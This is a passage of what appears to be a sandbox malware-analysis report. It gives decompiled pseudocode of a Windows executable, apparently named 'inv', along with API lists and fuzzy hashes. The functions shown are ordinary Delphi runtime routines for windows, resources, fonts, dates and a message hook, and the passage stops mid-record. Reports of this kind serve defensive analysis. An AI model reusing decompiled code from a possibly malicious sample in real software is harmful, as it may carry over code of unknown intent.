                                  				asm("sbb eax, eax");
                                  				_t11 = _t10 + 1;
                                  				if(_t11 == 0 || L004061D0 != _v44.lpfnWndProc) {
                                  					if(_t11 != 0) {
                                  						_t19 =  *0x44f664; // 0x400000
                                  						_t20 =  *0x44d414; // 0x41a000
                                  						UnregisterClassA(_t20, _t19);
                                  					}
                                  					RegisterClassA(0x44d3f0);
                                  				}
                                  				_t13 =  *0x44f664; // 0x400000
                                  				_t24 =  *0x44d414; // 0x41a000
                                  				_t22 = E004066D0(0x80, _t24, 0, _t13, 0, 0, 0, 0, 0, 0, 0x80000000);
                                  				if(_a6 != 0) {
                                  					SetWindowLongA(_t22, 0xfffffffc, E00419F54(_a4, _a8));
                                  				}
                                  				return _t22;
                                  			}















                                  APIs
                                  Similarity
                                  • API ID: Class$InfoLongRegisterUnregisterWindow
                                  • String ID:
                                  • API String ID: 4025006896-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0044A198(void* __eax, void* __ecx, char __edx) {
                                  				char _v12;
                                  				struct HWND__* _v20;
                                  				int _t17;
                                  				void* _t27;
                                  				struct HWND__* _t33;
                                  				void* _t35;
                                  				void* _t36;
                                  				long _t37;
                                  
                                  				_t37 = _t36 + 0xfffffff8;
                                  				_t27 = __eax;
                                  				_t17 =  *0x44fbb0; // 0x2191714
                                  				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                  					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                  						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                  						_v12 = __edx;
                                  						EnumWindows(E0044A128, _t37);
                                  						_t5 = _t27 + 0x90; // 0x0
                                  						_t17 =  *_t5;
                                  						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                  							_t33 = GetWindow(_v20, 3);
                                  							_v20 = _t33;
                                  							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                  								_v20 = 0xfffffffe;
                                  							}
                                  							_t10 = _t27 + 0x90; // 0x0
                                  							_t17 =  *_t10;
                                  							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                  							if(_t35 >= 0) {
                                  								do {
                                  									_t13 = _t27 + 0x90; // 0x0
                                  									_t17 = SetWindowPos(E00413524( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                                  									_t35 = _t35 - 1;
                                  								} while (_t35 != 0xffffffff);
                                  							}
                                  						}
                                  					}
                                  					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                  				}
                                  				return _t17;
                                  			}












                                  APIs
                                  • EnumWindows.USER32(0044A128), ref: 0044A1CD
                                  • GetWindow.USER32(00000003,00000003), ref: 0044A1E5
                                  • GetWindowLongA.USER32 ref: 0044A1F2
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 0044A231
                                  Similarity
                                  • API ID: Window$EnumLongWindows
                                  • String ID:
                                  • API String ID: 4191631535-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 82%
                                  			E00415ABC(void* __eax, struct HINSTANCE__* __edx, CHAR* _a4) {
                                  				CHAR* _v8;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t18;
                                  				void* _t23;
                                  				CHAR* _t24;
                                  				void* _t25;
                                  				struct HRSRC__* _t29;
                                  				void* _t30;
                                  				struct HINSTANCE__* _t31;
                                  				void* _t32;
                                  
                                  				_v8 = _t24;
                                  				_t31 = __edx;
                                  				_t23 = __eax;
                                  				_t29 = FindResourceA(__edx, _v8, _a4);
                                  				 *(_t23 + 0x10) = _t29;
                                  				_t33 = _t29;
                                  				if(_t29 == 0) {
                                  					E00415A4C(_t23, _t24, _t29, _t31, _t33, _t32);
                                  					_pop(_t24);
                                  				}
                                  				_t5 = _t23 + 0x10; // 0x415b60
                                  				_t30 = LoadResource(_t31,  *_t5);
                                  				 *(_t23 + 0x14) = _t30;
                                  				_t34 = _t30;
                                  				if(_t30 == 0) {
                                  					E00415A4C(_t23, _t24, _t30, _t31, _t34, _t32);
                                  				}
                                  				_t7 = _t23 + 0x10; // 0x415b60
                                  				_push(SizeofResource(_t31,  *_t7));
                                  				_t8 = _t23 + 0x14; // 0x415824
                                  				_t18 = LockResource( *_t8);
                                  				_pop(_t25);
                                  				return E004157E4(_t23, _t25, _t18);
                                  			}


















                                  APIs
                                  • FindResourceA.KERNEL32(?,?,?), ref: 00415AD3
                                  • LoadResource.KERNEL32(?,00415B60,?,?,?,00411990,?,00000001,00000000,?,00415A2C,?), ref: 00415AED
                                  • SizeofResource.KERNEL32(?,00415B60,?,00415B60,?,?,?,00411990,?,00000001,00000000,?,00415A2C,?), ref: 00415B07
                                  • LockResource.KERNEL32(00415824,00000000,?,00415B60,?,00415B60,?,?,?,00411990,?,00000001,00000000,?,00415A2C,?), ref: 00415B11
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID:
                                  • API String ID: 3473537107-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E00429C54(struct HWND__* __eax, void* __ecx) {
                                  				intOrPtr _t9;
                                  				signed int _t16;
                                  				struct HWND__* _t19;
                                  				DWORD* _t20;
                                  
                                  				_t17 = __ecx;
                                  				_push(__ecx);
                                  				_t19 = __eax;
                                  				_t16 = 0;
                                  				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
                                  					_t9 =  *0x44fb20; // 0x2191290
                                  					if(GlobalFindAtomA(E004042D0(_t9)) !=  *0x44fb1c) {
                                  						_t16 = 0 | E00428D9C(_t19, _t17) != 0x00000000;
                                  					} else {
                                  						_t16 = 0 | GetPropA(_t19,  *0x44fb1c & 0x0000ffff) != 0x00000000;
                                  					}
                                  				}
                                  				return _t16;
                                  			}








                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00429C61
                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,-0000000C,00000000,00429CCC,00429A8E,0044FB54,00000000,0042987E,?,-0000000C,?), ref: 00429C6A
                                  • GlobalFindAtomA.KERNEL32 ref: 00429C7F
                                  • GetPropA.USER32 ref: 00429C96
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E00428DD0(struct HWND__* __eax, void* __ecx) {
                                  				intOrPtr _t5;
                                  				struct HWND__* _t12;
                                  				void* _t15;
                                  				DWORD* _t16;
                                  
                                  				_t13 = __ecx;
                                  				_push(__ecx);
                                  				_t12 = __eax;
                                  				_t15 = 0;
                                  				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
                                  					_t5 =  *0x44fb24; // 0x21912ac
                                  					if(GlobalFindAtomA(E004042D0(_t5)) !=  *0x44fb1e) {
                                  						_t15 = E00428D9C(_t12, _t13);
                                  					} else {
                                  						_t15 = GetPropA(_t12,  *0x44fb1e & 0x0000ffff);
                                  					}
                                  				}
                                  				return _t15;
                                  			}








                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00428DDD
                                  • GetCurrentProcessId.KERNEL32(?,?,00000000,0044AEBB,?,?,0044C944,00000001,0044B027,?,?,?,0044C944), ref: 00428DE6
                                  • GlobalFindAtomA.KERNEL32 ref: 00428DFB
                                  • GetPropA.USER32 ref: 00428E12
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: ba7cf0c06c584b08bb2dfc983f4ffe8c357acdf5528f982da89ebd4fbb431b4d
                                  • Instruction ID: 9fa8f58df946c451fd89f97504a56d60844c3abe2df67e09c3138ab7398f1387
                                  • Opcode Fuzzy Hash: ba7cf0c06c584b08bb2dfc983f4ffe8c357acdf5528f982da89ebd4fbb431b4d
                                  • Instruction Fuzzy Hash: CDF0A06270223166DA20B7B6FD8182F22DCCD05399382483FF901E7286CE3CDC0582BC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00449AA8(void* __ecx) {
                                  				void* _t2;
                                  				DWORD* _t7;
                                  
                                  				_t2 =  *0x44fbb0; // 0x2191714
                                  				if( *((char*)(_t2 + 0xa5)) == 0) {
                                  					if( *0x44fbc8 == 0) {
                                  						_t2 = SetWindowsHookExA(3, E00449A64, 0, GetCurrentThreadId());
                                  						 *0x44fbc8 = _t2;
                                  					}
                                  					if( *0x44fbc4 == 0) {
                                  						_t2 = CreateEventA(0, 0, 0, 0);
                                  						 *0x44fbc4 = _t2;
                                  					}
                                  					if( *0x44fbcc == 0) {
                                  						_t2 = CreateThread(0, 0x3e8, E00449A08, 0, 0, _t7);
                                  						 *0x44fbcc = _t2;
                                  					}
                                  				}
                                  				return _t2;
                                  			}






                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00449AC0
                                  • SetWindowsHookExA.USER32 ref: 00449AD0
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00449AEB
                                  • CreateThread.KERNEL32(00000000,000003E8,00449A08,00000000,00000000), ref: 00449B0F
                                  Similarity
                                  • API ID: CreateThread$CurrentEventHookWindows
                                  • String ID:
                                  • API String ID: 1195359707-0
                                  • Opcode ID: 771ba898037f9b404c22616256884bf9cab39921dfe3e221527c2129b78333f4
                                  • Instruction ID: ae2ff5243f0b01373a0a0d56d2626c96ffedc2f8609201df67394c329967d082
                                  • Opcode Fuzzy Hash: 771ba898037f9b404c22616256884bf9cab39921dfe3e221527c2129b78333f4
                                  • Instruction Fuzzy Hash: ADF03A746803C0BEF7109B11EC2BF272598E713B0AF50107FF2047A2D9D6B829889A5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E0041F180(void* __eflags) {
                                  				intOrPtr _t13;
                                  				intOrPtr _t19;
                                  				void* _t20;
                                  
                                  				DeleteObject( *(_t20 - 0x10));
                                  				E00403874();
                                  				E004038C8();
                                  				_pop(_t19);
                                  				 *[fs:eax] = _t19;
                                  				_push(0x41f1d1);
                                  				DeleteDC( *(_t20 - 0x1c));
                                  				_t13 =  *((intOrPtr*)(_t20 - 0x18));
                                  				_push(_t13);
                                  				_push(0);
                                  				L004064F8();
                                  				if( *(_t20 - 0x10) != 0) {
                                  					return GetObjectA( *(_t20 - 0x10), 0x54,  *(_t20 + 0xc));
                                  				}
                                  				return _t13;
                                  			}







                                  APIs
                                  • DeleteObject.GDI32(?), ref: 0041F184
                                  • DeleteDC.GDI32(?), ref: 0041F1A4
                                  • 72E7B380.USER32(00000000,?,?,0041F1D1), ref: 0041F1AF
                                  • GetObjectA.GDI32(?,00000054,?), ref: 0041F1C4
                                  Similarity
                                  • API ID: DeleteObject$B380
                                  • String ID:
                                  • API String ID: 2559486108-0
                                  • Opcode ID: 7c334954e88b4c01f292aeea7feef128e9ec1885feaff5888003de74d532461c
                                  • Instruction ID: 33614a505fb9bdf8b6d7951bcc44fc4a6d5273dcdda0b1b0409f6eecb60bd1f9
                                  • Opcode Fuzzy Hash: 7c334954e88b4c01f292aeea7feef128e9ec1885feaff5888003de74d532461c
                                  • Instruction Fuzzy Hash: 24E03072644205AEEB00EBE6DC46BBE77A8EB44304F41483AB511A61C1C63C98448728
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00406658(void* __eax, int __ecx, long __edx) {
                                  				void* _t2;
                                  				void* _t4;
                                  
                                  				_t2 = GlobalHandle(__eax);
                                  				GlobalUnWire(_t2);
                                  				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                                  				GlobalFix(_t4);
                                  				return _t4;
                                  			}






                                  APIs
                                  Similarity
                                  • API ID: Global$AllocHandleWire
                                  • String ID:
                                  • API String ID: 2210401237-0
                                  • Opcode ID: dd0af09868c75cb0275c6e7709d4b38ad3534b4c99d0890db1c8dd30b2df49b7
                                  • Instruction ID: 4c91e0f90ce5e5bcf0bd18554aae6042f314b8d243397295f91aa16475200aa5
                                  • Opcode Fuzzy Hash: dd0af09868c75cb0275c6e7709d4b38ad3534b4c99d0890db1c8dd30b2df49b7
                                  • Instruction Fuzzy Hash: 77B002F5864A0439E80473F7CC0FD3B101DD8907497D4496E3480B2582997C9A0009BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 79%
                                  			E0041BF14(void* __eax, void* __ebx, void* __ecx) {
                                  				signed int _v8;
                                  				struct tagLOGFONTA _v68;
                                  				char _v72;
                                  				char _v76;
                                  				char _v80;
                                  				intOrPtr _t76;
                                  				intOrPtr _t81;
                                  				void* _t107;
                                  				void* _t116;
                                  				intOrPtr _t126;
                                  				void* _t137;
                                  				void* _t138;
                                  				intOrPtr _t139;
                                  
                                  				_t137 = _t138;
                                  				_t139 = _t138 + 0xffffffb4;
                                  				_v80 = 0;
                                  				_v76 = 0;
                                  				_v72 = 0;
                                  				_t116 = __eax;
                                  				_push(_t137);
                                  				_push(0x41c09d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t139;
                                  				_v8 =  *((intOrPtr*)(__eax + 0x10));
                                  				if( *((intOrPtr*)(_v8 + 8)) != 0) {
                                  					 *[fs:eax] = 0;
                                  					_push(E0041C0A4);
                                  					return E00403E34( &_v80, 3);
                                  				} else {
                                  					_t76 =  *0x44f8d8; // 0x2190a30
                                  					E0041B258(_t76);
                                  					_push(_t137);
                                  					_push(0x41c075);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t139;
                                  					if( *((intOrPtr*)(_v8 + 8)) == 0) {
                                  						_v68.lfHeight =  *(_v8 + 0x14);
                                  						_v68.lfWidth = 0;
                                  						_v68.lfEscapement = 0;
                                  						_v68.lfOrientation = 0;
                                  						if(( *(_v8 + 0x19) & 0x00000001) == 0) {
                                  							_v68.lfWeight = 0x190;
                                  						} else {
                                  							_v68.lfWeight = 0x2bc;
                                  						}
                                  						_v68.lfItalic = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000002) != 0x00000000;
                                  						_v68.lfUnderline = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000004) != 0x00000000;
                                  						_v68.lfStrikeOut = _v8 & 0xffffff00 | ( *(_v8 + 0x19) & 0x00000008) != 0x00000000;
                                  						_v68.lfCharSet =  *((intOrPtr*)(_v8 + 0x1a));
                                  						E00404074( &_v72, _v8 + 0x1b);
                                  						if(E004079D0(_v72, "Default") != 0) {
                                  							E00404074( &_v80, _v8 + 0x1b);
                                  							E004081C0( &(_v68.lfFaceName), _v80);
                                  						} else {
                                  							E00404074( &_v76, "\rMS Sans Serif");
                                  							E004081C0( &(_v68.lfFaceName), _v76);
                                  						}
                                  						_v68.lfQuality = 0;
                                  						_v68.lfOutPrecision = 0;
                                  						_v68.lfClipPrecision = 0;
                                  						_t107 = E0041C1F8(_t116) - 1;
                                  						if(_t107 == 0) {
                                  							_v68.lfPitchAndFamily = 2;
                                  						} else {
                                  							if(_t107 == 1) {
                                  								_v68.lfPitchAndFamily = 1;
                                  							} else {
                                  								_v68.lfPitchAndFamily = 0;
                                  							}
                                  						}
                                  						 *((intOrPtr*)(_v8 + 8)) = CreateFontIndirectA( &_v68);
                                  					}
                                  					_pop(_t126);
                                  					 *[fs:eax] = _t126;
                                  					_push(0x41c07c);
                                  					_t81 =  *0x44f8d8; // 0x2190a30
                                  					return E0041B264(_t81);
                                  				}
                                  			}

















                                  APIs
                                    • Part of subcall function 0041B258: RtlEnterCriticalSection.KERNEL32(?,0041B295), ref: 0041B25C
                                  • CreateFontIndirectA.GDI32(?), ref: 0041C052
                                  Strings
                                  Similarity
                                  • API ID: CreateCriticalEnterFontIndirectSection
                                  • String ID: MS Sans Serif$Default
                                  • API String ID: 2931345757-2137701257
                                  • Opcode ID: 15e5fc313b2ea2672533761faba1647e245f8d16613775bf8d119fffa8f19717
                                  • Instruction ID: 4f4b8599f795875a76f08e3564f3cc0d64f2e4023db53973bc2c8d05bd773dce
                                  • Opcode Fuzzy Hash: 15e5fc313b2ea2672533761faba1647e245f8d16613775bf8d119fffa8f19717
                                  • Instruction Fuzzy Hash: 89515D30A44248DFDB01CFA8C985BCDBBF5EF49304F2580AAE804A7352D3789E45DB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 86%
                                  			E0040B484(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                  				char _v8;
                                  				struct _MEMORY_BASIC_INFORMATION _v36;
                                  				char _v297;
                                  				char _v304;
                                  				intOrPtr _v308;
                                  				char _v312;
                                  				char _v316;
                                  				char _v320;
                                  				intOrPtr _v324;
                                  				char _v328;
                                  				void* _v332;
                                  				char _v336;
                                  				char _v340;
                                  				char _v344;
                                  				char _v348;
                                  				intOrPtr _v352;
                                  				char _v356;
                                  				char _v360;
                                  				char _v364;
                                  				void* _v368;
                                  				char _v372;
                                  				intOrPtr _t52;
                                  				intOrPtr _t60;
                                  				intOrPtr _t82;
                                  				intOrPtr _t86;
                                  				intOrPtr _t89;
                                  				intOrPtr _t101;
                                  				void* _t108;
                                  				intOrPtr _t110;
                                  				void* _t113;
                                  
                                  				_t108 = __edi;
                                  				_v372 = 0;
                                  				_v336 = 0;
                                  				_v344 = 0;
                                  				_v340 = 0;
                                  				_v8 = 0;
                                  				_push(_t113);
                                  				_push(0x40b63f);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t113 + 0xfffffe90;
                                  				_t89 =  *((intOrPtr*)(_a4 - 4));
                                  				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                  					_t52 =  *0x44dfc0; // 0x4069d8
                                  					E00405910(_t52,  &_v8);
                                  				} else {
                                  					_t86 =  *0x44e118; // 0x4069d0
                                  					E00405910(_t86,  &_v8);
                                  				}
                                  				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                                  				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                                  				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                  					_v368 =  *(_t89 + 0xc);
                                  					_v364 = 5;
                                  					_v360 = _v8;
                                  					_v356 = 0xb;
                                  					_v352 = _t110;
                                  					_v348 = 5;
                                  					_t60 =  *0x44dfcc; // 0x406980
                                  					E00405910(_t60,  &_v372);
                                  					E0040B0AC(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                                  				} else {
                                  					_v332 =  *(_t89 + 0xc);
                                  					_v328 = 5;
                                  					E00404080( &_v340, 0x105,  &_v297);
                                  					E00408040(_v340,  &_v336);
                                  					_v324 = _v336;
                                  					_v320 = 0xb;
                                  					_v316 = _v8;
                                  					_v312 = 0xb;
                                  					_v308 = _t110;
                                  					_v304 = 5;
                                  					_t82 =  *0x44e028; // 0x406a78
                                  					E00405910(_t82,  &_v344);
                                  					E0040B0AC(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                                  				}
                                  				_pop(_t101);
                                  				 *[fs:eax] = _t101;
                                  				_push(E0040B646);
                                  				E00403E10( &_v372);
                                  				E00403E34( &_v344, 3);
                                  				return E00403E10( &_v8);
                                  			}


































                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040B63F), ref: 0040B4EF
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040B63F), ref: 0040B511
                                    • Part of subcall function 00405910: LoadStringA.USER32 ref: 00405941
                                  Strings
                                  Similarity
                                  • API ID: FileLoadModuleNameQueryStringVirtual
                                  • String ID: xj@
                                  • API String ID: 902310565-1282220615
                                  • Opcode ID: 504990ac6bcb2f19d502f07f8d58a56d2b499871b1a821fc19a288371ebdd347
                                  • Instruction ID: b80f6a5a7135726d1858f78814a1b34a57ad59531f4df85fb4d22ac48566557d
                                  • Opcode Fuzzy Hash: 504990ac6bcb2f19d502f07f8d58a56d2b499871b1a821fc19a288371ebdd347
                                  • Instruction Fuzzy Hash: 7A410770900658DFDB60DF65CC85BDAB7F4EB48304F4044EAE408A7291D779AE84CF99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E0043ED50(intOrPtr __eax, void* __edx) {
                                  				char _v8;
                                  				signed short _v10;
                                  				intOrPtr _v16;
                                  				char _v17;
                                  				char _v24;
                                  				intOrPtr _t34;
                                  				intOrPtr _t40;
                                  				intOrPtr _t42;
                                  				intOrPtr _t48;
                                  				void* _t51;
                                  				intOrPtr _t64;
                                  				intOrPtr _t67;
                                  				void* _t69;
                                  				void* _t71;
                                  				intOrPtr _t72;
                                  
                                  				_t69 = _t71;
                                  				_t72 = _t71 + 0xffffffec;
                                  				_t51 = __edx;
                                  				_v16 = __eax;
                                  				_v10 =  *((intOrPtr*)(__edx + 4));
                                  				if(_v10 == 0) {
                                  					return 0;
                                  				} else {
                                  					if(GetKeyState(0x10) < 0) {
                                  						_v10 = _v10 + 0x2000;
                                  					}
                                  					if(GetKeyState(0x11) < 0) {
                                  						_v10 = _v10 + 0x4000;
                                  					}
                                  					if(( *(_t51 + 0xb) & 0x00000020) != 0) {
                                  						_v10 = _v10 + 0x8000;
                                  					}
                                  					_v24 =  *((intOrPtr*)(_v16 + 0x34));
                                  					_t34 =  *0x44fba4; // 0x2190da8
                                  					E00421948(_t34,  &_v24);
                                  					_push(_t69);
                                  					_push(0x43ee4e);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t72;
                                  					while(1) {
                                  						_v17 = 0;
                                  						_v8 = E0043EA54(_v16, 2, _v10 & 0x0000ffff);
                                  						if(_v8 != 0) {
                                  							break;
                                  						}
                                  						if(_v24 == 0 || _v17 != 2) {
                                  							_pop(_t64);
                                  							 *[fs:eax] = _t64;
                                  							_push(0x43ee55);
                                  							_t40 =  *0x44fba4; // 0x2190da8
                                  							return E00421940(_t40);
                                  						} else {
                                  							continue;
                                  						}
                                  						goto L14;
                                  					}
                                  					_t42 =  *0x44fba4; // 0x2190da8
                                  					E00421948(_t42,  &_v8);
                                  					_push(_t69);
                                  					_push(0x43ee23);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t72;
                                  					_v17 = E0043EBFC( &_v8, 0, _t69);
                                  					_pop(_t67);
                                  					 *[fs:eax] = _t67;
                                  					_push(0x43ee2a);
                                  					_t48 =  *0x44fba4; // 0x2190da8
                                  					return E00421940(_t48);
                                  				}
                                  				L14:
                                  			}

                                  APIs
                                  • GetKeyState.USER32(00000010), ref: 0043ED74
                                  • GetKeyState.USER32(00000011), ref: 0043ED86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: State
                                  • String ID:
                                  • API String ID: 1649606143-3916222277
                                  • Opcode ID: 3c257ecfa46ef8cfa8d46a62b131d070b30a5a9394f877d8deeb70aa2bb7f02d
                                  • Instruction ID: 4f76d382704f7fb224acd00f04b480a3934c04ed790ce385eac2d8e81479b68b
                                  • Opcode Fuzzy Hash: 3c257ecfa46ef8cfa8d46a62b131d070b30a5a9394f877d8deeb70aa2bb7f02d
                                  • Instruction Fuzzy Hash: 89312731E05248EFDB11DFA6D81279EB7F5EF4D314F5180BAE804AA2E1E7785A00C618
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 72%
                                  			E00409684(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
                                  				char _v8;
                                  				short _v18;
                                  				short _v22;
                                  				struct _SYSTEMTIME _v24;
                                  				char _v280;
                                  				char* _t32;
                                  				intOrPtr* _t49;
                                  				intOrPtr _t58;
                                  				void* _t63;
                                  				void* _t67;
                                  
                                  				_v8 = 0;
                                  				_t49 = __edx;
                                  				_t63 = __eax;
                                  				_push(_t67);
                                  				_push(0x409762);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t67 + 0xfffffeec;
                                  				E00403E10(__edx);
                                  				_v24 =  *((intOrPtr*)(_a4 - 0xe));
                                  				_v22 =  *((intOrPtr*)(_a4 - 0x10));
                                  				_v18 =  *((intOrPtr*)(_a4 - 0x12));
                                  				if(_t63 > 2) {
                                  					E00403EA8( &_v8, 0x409784);
                                  				} else {
                                  					E00403EA8( &_v8, 0x409778);
                                  				}
                                  				_t32 = E004042D0(_v8);
                                  				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
                                  					E00404080(_t49, 0x100,  &_v280);
                                  					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
                                  						E00404330( *_t49, E004040D0( *_t49) - 1, 2, _t49);
                                  					}
                                  				}
                                  				_pop(_t58);
                                  				 *[fs:eax] = _t58;
                                  				_push(E00409769);
                                  				return E00403E10( &_v8);
                                  			}

                                  APIs
                                  • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00409762), ref: 0040970A
                                  • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,00409762), ref: 00409710
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: DateFormatLocaleThread
                                  • String ID: yyyy
                                  • API String ID: 3303714858-3145165042
                                  • Opcode ID: 9766ac0e910df15fb4758d2c7b9f1ccb5d830caef30e88c180c22abfecdeeb57
                                  • Instruction ID: e2a26f48646bc91a1725cc249aff767ba32fc1c342cb51e6fb829c96139d47bf
                                  • Opcode Fuzzy Hash: 9766ac0e910df15fb4758d2c7b9f1ccb5d830caef30e88c180c22abfecdeeb57
                                  • Instruction Fuzzy Hash: A52162756106089BDB01EF65C942AEFB7A8EF48300F50447AF944F7392D7789E408669
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0042C270(void* __eflags, intOrPtr _a4) {
                                  				char _v5;
                                  				struct tagRECT _v21;
                                  				struct tagRECT _v40;
                                  				void* _t40;
                                  				void* _t45;
                                  
                                  				_v5 = 1;
                                  				_t44 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198));
                                  				_t45 = E00413580( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30)) + 0x198)),  *((intOrPtr*)(_a4 - 4)));
                                  				if(_t45 <= 0) {
                                  					L5:
                                  					_v5 = 0;
                                  				} else {
                                  					do {
                                  						_t45 = _t45 - 1;
                                  						_t40 = E00413524(_t44, _t45);
                                  						if( *((char*)(_t40 + 0x57)) == 0 || ( *(_t40 + 0x50) & 0x00000040) == 0) {
                                  							goto L4;
                                  						} else {
                                  							E0042B890(_t40,  &_v40);
                                  							IntersectRect( &_v21, _a4 + 0xffffffec,  &_v40);
                                  							if(EqualRect( &_v21, _a4 + 0xffffffec) == 0) {
                                  								goto L4;
                                  							}
                                  						}
                                  						goto L6;
                                  						L4:
                                  					} while (_t45 > 0);
                                  					goto L5;
                                  				}
                                  				L6:
                                  				return _v5;
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Rect$EqualIntersect
                                  • String ID: @
                                  • API String ID: 3291753422-2766056989
                                  • Opcode ID: f3d2bcba678d793751b5d497cced17de83e92f3d07b1dde45eb5e8d406fc954f
                                  • Instruction ID: 8b597ec3d75e9df79f289e96feeeaa2bddebb3b7a55d53fe8eb65cff51145dd2
                                  • Opcode Fuzzy Hash: f3d2bcba678d793751b5d497cced17de83e92f3d07b1dde45eb5e8d406fc954f
